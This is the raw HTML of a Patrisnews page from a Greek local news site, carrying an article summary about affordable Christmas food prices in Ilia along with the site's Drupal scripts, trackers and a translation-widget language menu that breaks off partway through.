<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
  "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el" version="XHTML+RDFa 1.0" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:og="http://ogp.me/ns#" xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#" xmlns:sioc="http://rdfs.org/sioc/ns#" xmlns:sioct="http://rdfs.org/sioc/types#" xmlns:skos="http://www.w3.org/2004/02/skos/core#" xmlns:xsd="http://www.w3.org/2001/XMLSchema#">
<head profile="http://www.w3.org/1999/xhtml/vocab">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<link rel="shortlink" href="http://www.patrisnews.com/node/182700"/>
<link rel="canonical" href="http://www.patrisnews.com/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi"/>
<meta property="og:type" content="article"/>
<meta property="og:site_name" content="Patris News :: Εφημερίδα Πατρίς, τα νέα της Ηλείας, ειδήσεις από την Ηλεία, Ηλειακά blogs, Ηλεικά νέα, ilia news, news"/>
<link rel="shortcut icon" href="http://www.patrisnews.com/sites/default/files/favicon_0.ico" type="image/vnd.microsoft.icon"/>
<meta property="og:url" content="http://www.patrisnews.com/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi"/>
<meta name="generator" content="Drupal 7 (http://drupal.org)"/>
<meta property="og:description" content=" Πλουσιότερο αλλά πιο…οικονομικό θα είναι φέτος το Χριστουγεννιάτικο τραπέζι των Ηλείων, αφού οι τιμές των προϊόντων - σύμφωνα με τους επαγγελματίες της περιοχής - είτε παραμένουν σταθερές είτε έχουν μειωθεί σημαντικά, προκειμένου να μπορέσει ο κόσμος να αγοράσει τα απαραίτητα για το Χριστουγεννιάτικο τραπέζι αλλά και να κινηθεί η αγορά που αυτές τις ημέρες έχει την «τιμητική» της, αφού οι Έλληνες, θέλουν το γιορτινό τραπέζι γύρω από το"/>
<meta about="/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi" property="sioc:num_replies" content="0" datatype="xsd:integer"/>
<meta content="Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι" about="/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi" property="dc:title"/>
<meta name="abstract" content="Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι"/>
<meta name="keywords" content="Χριστουγεννιάτικο τραπέζι,Χριστούγεννα,Ηλεία,καταστήματα Ηλεία"/>
<meta property="og:title" content="Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι | Patrisnews"/>
<meta name="description" content=" Πλουσιότερο αλλά πιο…οικονομικό θα είναι φέτος το Χριστουγεννιάτικο τραπέζι των Ηλείων, αφού οι τιμές των προϊόντων - σύμφωνα με τους επαγγελματίες της περιοχής - είτε παραμένουν σταθερές είτε έχουν μειωθεί σημαντικά, προκειμένου να μπορέσει ο κόσμος να αγοράσει τα απαραίτητα για το Χριστουγεννιάτικο τραπέζι αλλά και να κινηθεί η αγορά που αυτές τις ημέρες έχει την «τιμητική» της, αφού οι Έλληνες, θέλουν το γιορτινό τραπέζι γύρω από το"/>
<meta property="og:image" content="http://www.patrisnews.com/sites/default/files/field/news/image/kreopwleio.jpg"/>
<title>Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι | Patrisnews</title>
<style type="text/css" media="all">@import url("http://www.patrisnews.com/modules/system/system.base.css?oik1a3");@import url("http://www.patrisnews.com/modules/system/system.menus.css?oik1a3");@import url("http://www.patrisnews.com/modules/system/system.messages.css?oik1a3");@import url("http://www.patrisnews.com/modules/system/system.theme.css?oik1a3");</style>
<style type="text/css" media="all">@import url("http://www.patrisnews.com/modules/comment/comment.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/date/date_api/date.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/date/date_popup/themes/datepicker.1.7.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/fences/field.css?oik1a3");@import url("http://www.patrisnews.com/modules/node/node.css?oik1a3");@import url("http://www.patrisnews.com/modules/poll/poll.css?oik1a3");@import url("http://www.patrisnews.com/modules/search/search.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/simpleads/simpleads.css?oik1a3");@import url("http://www.patrisnews.com/modules/user/user.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/views/css/views.css?oik1a3");</style>
<style type="text/css" media="all">@import url("http://www.patrisnews.com/sites/all/modules/colorbox/styles/default/colorbox_style.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/ctools/css/ctools.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/custom/myajax/myajax.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/modules/ajaxblocks/ajaxblocks.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/libraries/superfish/css/superfish.css?oik1a3");</style>
<style type="text/css" media="all">@import url("http://www.patrisnews.com/sites/all/themes/patrisnewtheme/css/reset.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/themes/patrisnewtheme/css/style.css?oik1a3");@import url("http://www.patrisnews.com/sites/all/themes/patrisnewtheme/css/jquery.mCustomScrollbar.css?oik1a3");</style>
<!--[if (gte IE 9)|(gt IEMobile 7)|(!IE)]><!-->
<style type="text/css" media="all">@import url("http://www.patrisnews.com/sites/all/themes/patrisnewtheme/css/ie.css?oik1a3");</style>
<!--<![endif]-->
<style type="text/css" media="all">@import url("http://www.patrisnews.com/sites/default/files/fontyourface/font.css?oik1a3");@import url("http://www.patrisnews.com/sites/default/files/fontyourface/local_fonts/PFDinBold-normal-bold/stylesheet.css?oik1a3");@import url("http://www.patrisnews.com/sites/default/files/fontyourface/local_fonts/PFDinReg-normal-normal/stylesheet.css?oik1a3");</style>
<script type="text/javascript" src="http://www.patrisnews.com/misc/jquery.js?v=1.4.4"></script>
<script type="text/javascript" src="http://www.patrisnews.com/misc/jquery.once.js?v=1.2"></script>
<script type="text/javascript" src="http://www.patrisnews.com/misc/drupal.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/simpleads/simpleads.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/default/files/languages/el_IvA2pyOVjixwMFfByqHQvJlt-jsMlxzzylEroesOAnw.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/libraries/colorbox/jquery.colorbox-min.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/colorbox/js/colorbox.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/colorbox/styles/default/colorbox_style.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/custom/myajax/myajax.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/google_analytics/googleanalytics.js?oik1a3"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-4994641-40"]);_gaq.push(["_trackPageview"]);(function() {var ga = document.createElement("script");ga.type = "text/javascript";ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(ga, s);})();
//--><!]]>
</script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/piwik/piwik.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/disqus/disqus.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/themes/patrisnewtheme/js/jcarousellite_1.0.1.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/ajaxblocks/ajaxblocks.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/libraries/superfish/superfish.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/libraries/superfish/jquery.hoverIntent.minified.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/libraries/superfish/supposition.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/libraries/superfish/supersubs.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/superfish/superfish.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/themes/patrisnewtheme/js/html5.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/themes/patrisnewtheme/js/jquery.mCustomScrollbar.concat.min.js?oik1a3"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/themes/patrisnewtheme/js/myscripts.js?oik1a3"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, {"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"patrisnewtheme","theme_token":"WOrTfQcTQYnThKroLY7AzgoJvhe-mx8Ap-OsZjniHMg","css":{"modules\/system\/system.base.css":1,"modules\/system\/system.menus.css":1,"modules\/system\/system.messages.css":1,"modules\/system\/system.theme.css":1,"modules\/comment\/comment.css":1,"sites\/all\/modules\/date\/date_api\/date.css":1,"sites\/all\/modules\/date\/date_popup\/themes\/datepicker.1.7.css":1,"modules\/field\/theme\/field.css":1,"modules\/node\/node.css":1,"modules\/poll\/poll.css":1,"modules\/search\/search.css":1,"sites\/all\/modules\/simpleads\/simpleads.css":1,"modules\/user\/user.css":1,"sites\/all\/modules\/views\/css\/views.css":1,"sites\/all\/modules\/colorbox\/styles\/default\/colorbox_style.css":1,"sites\/all\/modules\/ctools\/css\/ctools.css":1,"sites\/all\/modules\/custom\/myajax\/myajax.css":1,"sites\/all\/modules\/ajaxblocks\/ajaxblocks.css":1,"sites\/all\/libraries\/superfish\/css\/superfish.css":1,"sites\/all\/themes\/patrisnewtheme\/css\/reset.css":1,"sites\/all\/themes\/patrisnewtheme\/css\/style.css":1,"sites\/all\/themes\/patrisnewtheme\/css\/jquery.mCustomScrollbar.css":1,"sites\/all\/themes\/patrisnewtheme\/css\/ie.css":1,"sites\/default\/files\/fontyourface\/font.css":1,"public:\/\/fontyourface\/local_fonts\/PFDinBold-normal-bold\/stylesheet.css":1,"public:\/\/fontyourface\/local_fonts\/PFDinReg-normal-normal\/stylesheet.css":1},"js":{"misc\/jquery.js":1,"misc\/jquery.once.js":1,"misc\/drupal.js":1,"sites\/all\/modules\/simpleads\/simpleads.js":1,"public:\/\/languages\/el_IvA2pyOVjixwMFfByqHQvJlt-jsMlxzzylEroesOAnw.js":1,"sites\/all\/libraries\/colorbox\/jquery.colorbox-min.js":1,"sites\/all\/modules\/colorbox\/js\/colorbox.js":1,"sites\/all\/modules\/colorbox\/styles\/default\/colorbox_style.js":1,"sites\/all\/modules\/custom\/myajax\/myajax.js":1,"sites\/all\/modules\/google_analytics\/googleanalytics.js":1,"0":1,"sites\/all\/modules\/piwik\/piwik.js":1,"sites\/all\/modules\/disqus\/disqus.js":1,"sites\/all\/themes\/patrisnewtheme\/js\/jcarousellite_1.0.1.js":1,"sites\/all\/modules\/ajaxblocks\/ajaxblocks.js":1,"sites\/all\/libraries\/superfish\/superfish.js":1,"sites\/all\/libraries\/superfish\/jquery.hoverIntent.minified.js":1,"sites\/all\/libraries\/superfish\/supposition.js":1,"sites\/all\/libraries\/superfish\/supersubs.js":1,"sites\/all\/modules\/superfish\/superfish.js":1,"sites\/all\/themes\/patrisnewtheme\/js\/html5.js":1,"sites\/all\/themes\/patrisnewtheme\/js\/jquery.mCustomScrollbar.concat.min.js":1,"sites\/all\/themes\/patrisnewtheme\/js\/myscripts.js":1,"1":1,"http:\/\/s7.addthis.com\/js\/300\/addthis_widget.js#pubid=stavrosgian\u0026async=1":1,"sites\/all\/modules\/addthis\/addthis.js":1,"2":1,"3":1}},"colorbox":{"opacity":"0.85","current":"{current} of {total}","previous":"\u00ab Prev","next":"Next \u00bb","close":"\u039a\u03bb\u03b5\u03af\u03c3\u03b9\u03bc\u03bf","maxWidth":"98%","maxHeight":"98%","fixed":true,"mobiledetect":true,"mobiledevicewidth":"480px"},"addthis":{"load_type":"async"},"googleanalytics":{"trackOutbound":1,"trackMailto":1,"trackDownload":1,"trackDownloadExtensions":"7z|aac|arc|arj|asf|asx|avi|bin|csv|doc|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls|xml|z|zip"},"piwik":{"trackMailto":1},"superfish":[{"id":"1","sf":{"animation":{"opacity":"show","height":"show"},"speed":"\u0027fast\u0027","autoArrows":true,"dropShadows":true,"disableHI":false},"plugins":{"supposition":true,"bgiframe":false,"supersubs":{"minWidth":"12","maxWidth":"27","extraWidth":1}}},{"id":"2","sf":{"animation":{"opacity":"show","height":"show"},"speed":"\u0027fast\u0027","autoArrows":false,"dropShadows":false,"disableHI":false},"plugins":{"supposition":true,"bgiframe":false,"supersubs":{"minWidth":"12","maxWidth":"27","extraWidth":1}}}],"disqus":{"domain":"patrisnews","url":"http:\/\/www.patrisnews.com\/nea-enimerosi\/ileia\/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi","title":"\u0397\u03bb\u03b5\u03af\u03b1: \u00ab\u03a0\u03bb\u03bf\u03cd\u03c3\u03b9\u03bf\u00bb \u03c3\u03b5 \u03c0\u03c1\u03bf\u03ca\u03cc\u03bd\u03c4\u03b1, \u03bf\u03b9\u03ba\u03bf\u03bd\u03bf\u03bc\u03b9\u03ba\u03cc \u03c3\u03b5 \u03ba\u03cc\u03c3\u03c4\u03bf\u03c2 \u03c4\u03bf \u03a7\u03c1\u03b9\u03c3\u03c4\u03bf\u03c5\u03b3\u03b5\u03bd\u03bd\u03b9\u03ac\u03c4\u03b9\u03ba\u03bf \u03c4\u03c1\u03b1\u03c0\u03ad\u03b6\u03b9","identifier":"node\/182700"},"ajaxblocks":"blocks=views-last_news_in_details-block_1\u0026path=node\/182700","ajaxblocks_delay":10});
//--><!]]>
</script>
</head>
<body class="html not-front not-logged-in no-sidebars page-node page-node- page-node-182700 node-type-news">
 
<script type="text/javascript" src="https://d31qbv1cthcecs.cloudfront.net/atrk.js"></script><script type="text/javascript">_atrk_opts = { atrk_acct: "Pyl0h1awA400aQ", domain:"patrisnews.com"}; atrk ();</script><noscript><img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=Pyl0h1awA400aQ" style="display:none" height="1" width="1" alt=""/></noscript>
 
<div id="skip-link">
<a href="#main-content" class="element-invisible element-focusable">Παράκαμψη προς το κυρίως περιεχόμενο</a>
</div>
 
<div class="social-fb"><a href="/ort-live" target="_blank"><img style="border-width: 0px; border-style: solid; border: 0;" src="/sites/default/files/ort-tv.png" alt="" width="40" height="128"/></a></div>
<div class="social-twitter"><a href="http://www.onradio.gr/player.php?id=503" target="_blank"><img style="border-width: 0px; border-style: solid; border: 0;" src="/sites/default/files/ort-fm.png" alt="" width="40" height="128"/></a></div>
<div class="social-guide"><a href="/epaggelmatikos-odigos-index" target="_blank"><img style="border-width: 0px; border-style: solid; border: 0;" src="/sites/default/files/odigos.png" alt="" width="40" height="128"/></a></div>
 
<div id="wrapper">
<div class="skin" style="position:fixed;">
<div class="left" style="width: 129px; float: left; position: absolute; top: 176px; left:-135px;">
</div>
<div class="right" style="width: 300px; float: left; position: absolute; top: 176px; left:1003px;">
</div>
</div>
<header>
<div id="header-top">
<div class="left">
 
<ul id="social"><li><a href="https://www.facebook.com/patrisnews" target="_blank">Facebook</a></li>
<li><a href="https://twitter.com/patrisnewscom" target="_blank">Twitter</a></li>
</ul>  
</div>
<div class="right">
 
<div id="block-views-exp-search-articles-page" class="block block-views">
<div class="content">
<form action="/search-news" method="get" id="views-exposed-form-search-articles-page" accept-charset="UTF-8"><div><div class="views-exposed-form">
<div class="views-exposed-widgets clearfix">
<div id="edit-combine-wrapper" class="views-exposed-widget views-widget-filter-combine">
<div class="views-widget">
<div class="form-item form-type-textfield form-item-combine">
<input type="text" id="edit-combine" name="combine" value="" size="30" maxlength="128" class="form-text"/>
</div>
</div>
</div>
<div class="views-exposed-widget views-submit-button">
<input type="submit" id="edit-submit-search-articles" name="" value="Αναζήτηση" class="form-submit"/> </div>
</div>
</div>
</div></form> </div>
</div>
<div id="block-gtranslate-gtranslate" class="block block-gtranslate">
<div class="content">
<script type="text/javascript">
/* <![CDATA[ */
eval(unescape("eval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cr%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c/a%29%29%29+%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c+29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28/%5E/%2CString%29%29%7Bwhile%28c--%29r%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%3Bk%3D%5Bfunction%28e%29%7Breturn%20r%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw+%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29if%28k%5Bc%5D%29p%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%276%207%28a%2Cb%29%7Bn%7B4%282.9%29%7B3%20c%3D2.9%28%22o%22%29%3Bc.p%28b%2Cf%2Cf%29%3Ba.q%28c%29%7Dg%7B3%20c%3D2.r%28%29%3Ba.s%28%5C%27t%5C%27+b%2Cc%29%7D%7Du%28e%29%7B%7D%7D6%20h%28a%29%7B4%28a.8%29a%3Da.8%3B4%28a%3D%3D%5C%27%5C%27%29v%3B3%20b%3Da.w%28%5C%27%7C%5C%27%29%5B1%5D%3B3%20c%3B3%20d%3D2.x%28%5C%27y%5C%27%29%3Bz%283%20i%3D0%3Bi%3Cd.5%3Bi++%294%28d%5Bi%5D.A%3D%3D%5C%27B-C-D%5C%27%29c%3Dd%5Bi%5D%3B4%282.j%28%5C%27k%5C%27%29%3D%3DE%7C%7C2.j%28%5C%27k%5C%27%29.l.5%3D%3D0%7C%7Cc.5%3D%3D0%7C%7Cc.l.5%3D%3D0%29%7BF%286%28%29%7Bh%28a%29%7D%2CG%29%7Dg%7Bc.8%3Db%3B7%28c%2C%5C%27m%5C%27%29%3B7%28c%2C%5C%27m%5C%27%29%7D%7D%27%2C43%2C43%2C%27%7C%7Cdocument%7Cvar%7Cif%7Clength%7Cfunction%7CGTranslateFireEvent%7Cvalue%7CcreateEvent%7C%7C%7C%7C%7C%7Ctrue%7Celse%7CdoGTranslate%7C%7CgetElementById%7Cgoogle_translate_element2%7CinnerHTML%7Cchange%7Ctry%7CHTMLEvents%7CinitEvent%7CdispatchEvent%7CcreateEventObject%7CfireEvent%7Con%7Ccatch%7Creturn%7Csplit%7CgetElementsByTagName%7Cselect%7Cfor%7CclassName%7Cgoog%7Cte%7Ccombo%7Cnull%7CsetTimeout%7C500%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29"))
/* ]]> */
</script><style type="text/css"><!--
#goog-gt-tt {display:none !important;}

.goog-te-banner-frame {display:none !important;}

.goog-te-menu-value:hover {text-decoration:none !important;}

body {top:0 !important;}

#google_translate_element2 {display:none!important;}
--></style><div id="google_translate_element2"></div>
<script type="text/javascript">function googleTranslateElementInit2() {new google.translate.TranslateElement({pageLanguage: 'el', autoDisplay: false}, 'google_translate_element2');}</script>
<script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2"></script><style type="text/css"><!--
a.gtflag {background-image:url('/sites/all/modules/gtranslate/gtranslate-files/16a.png');}
a.gtflag:hover {background-image:url('/sites/all/modules/gtranslate/gtranslate-files/16.png');}
--></style><a href="javascript:doGTranslate('el|el')" title="Greek" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-400px -100px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="Greek"/></a> <a href="javascript:doGTranslate('el|sq')" title="Albanian" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-300px -400px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="Albanian"/></a> <a href="javascript:doGTranslate('el|zh-CN')" title="Chinese (Simplified)" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-300px -0px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="Chinese (Simplified)"/></a> <a href="javascript:doGTranslate('el|en')" title="English" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-0px -0px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="English"/></a> <a href="javascript:doGTranslate('el|fr')" title="French" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-200px -100px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="French"/></a> <a href="javascript:doGTranslate('el|de')" title="German" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-300px -100px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="German"/></a> <a href="javascript:doGTranslate('el|it')" title="Italian" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-600px -100px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="Italian"/></a> <a href="javascript:doGTranslate('el|pt')" title="Portuguese" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-300px -200px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="Portuguese"/></a> <a href="javascript:doGTranslate('el|ru')" title="Russian" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-500px -200px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="Russian"/></a> <a href="javascript:doGTranslate('el|es')" title="Spanish" class="gtflag" style="font-size:16px;padding:1px 0;background-repeat:no-repeat;background-position:-600px -200px;"><img src="/sites/all/modules/gtranslate/gtranslate-files/blank.png" height="16" width="16" style="border:0;vertical-align:top;" alt="Spanish"/></a> <select onchange="doGTranslate(this);"><option value="">Select Language</option><option value="el|el" style="font-weight:bold;background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -192px;padding-left:18px;">Greek</option><option value="el|sq" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -560px;padding-left:18px;">Albanian</option><option value="el|ar" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -16px;padding-left:18px;">Arabic</option><option value="el|be" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -768px;padding-left:18px;">Belarusian</option><option value="el|bg" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -32px;padding-left:18px;">Bulgarian</option><option value="el|ca" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -384px;padding-left:18px;">Catalan</option><option value="el|zh-CN" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -48px;padding-left:18px;">Chinese (Simplified)</option><option value="el|zh-TW" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -64px;padding-left:18px;">Chinese (Traditional)</option><option value="el|hr" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -80px;padding-left:18px;">Croatian</option><option value="el|cs" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -96px;padding-left:18px;">Czech</option><option value="el|da" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -112px;padding-left:18px;">Danish</option><option value="el|nl" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -128px;padding-left:18px;">Dutch</option><option value="el|en" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -0px;padding-left:18px;">English</option><option value="el|et" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -576px;padding-left:18px;">Estonian</option><option value="el|tl" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -400px;padding-left:18px;">Filipino</option><option value="el|fi" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -144px;padding-left:18px;">Finnish</option><option value="el|fr" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -160px;padding-left:18px;">French</option><option value="el|gl" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -592px;padding-left:18px;">Galician</option><option value="el|ka" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -880px;padding-left:18px;">Georgian</option><option value="el|de" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -176px;padding-left:18px;">German</option><option value="el|ht" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -896px;padding-left:18px;">Haitian Creole</option><option value="el|iw" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -416px;padding-left:18px;">Hebrew</option><option value="el|hi" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -208px;padding-left:18px;">Hindi</option><option value="el|hu" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -608px;padding-left:18px;">Hungarian</option><option value="el|is" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -784px;padding-left:18px;">Icelandic</option><option value="el|id" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -432px;padding-left:18px;">Indonesian</option><option value="el|ga" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -736px;padding-left:18px;">Irish</option><option value="el|it" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -224px;padding-left:18px;">Italian</option><option value="el|ja" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -240px;padding-left:18px;">Japanese</option><option value="el|ko" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -256px;padding-left:18px;">Korean</option><option value="el|lv" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -448px;padding-left:18px;">Latvian</option><option value="el|lt" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -464px;padding-left:18px;">Lithuanian</option><option value="el|mk" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -800px;padding-left:18px;">Macedonian</option><option value="el|ms" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -704px;padding-left:18px;">Malay</option><option value="el|mt" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -624px;padding-left:18px;">Maltese</option><option value="el|no" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -272px;padding-left:18px;">Norwegian</option><option value="el|fa" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -672px;padding-left:18px;">Persian</option><option value="el|pl" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -288px;padding-left:18px;">Polish</option><option value="el|pt" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -304px;padding-left:18px;">Portuguese</option><option value="el|ro" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -320px;padding-left:18px;">Romanian</option><option value="el|ru" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -336px;padding-left:18px;">Russian</option><option value="el|sr" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -480px;padding-left:18px;">Serbian</option><option value="el|sk" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -496px;padding-left:18px;">Slovak</option><option value="el|sl" 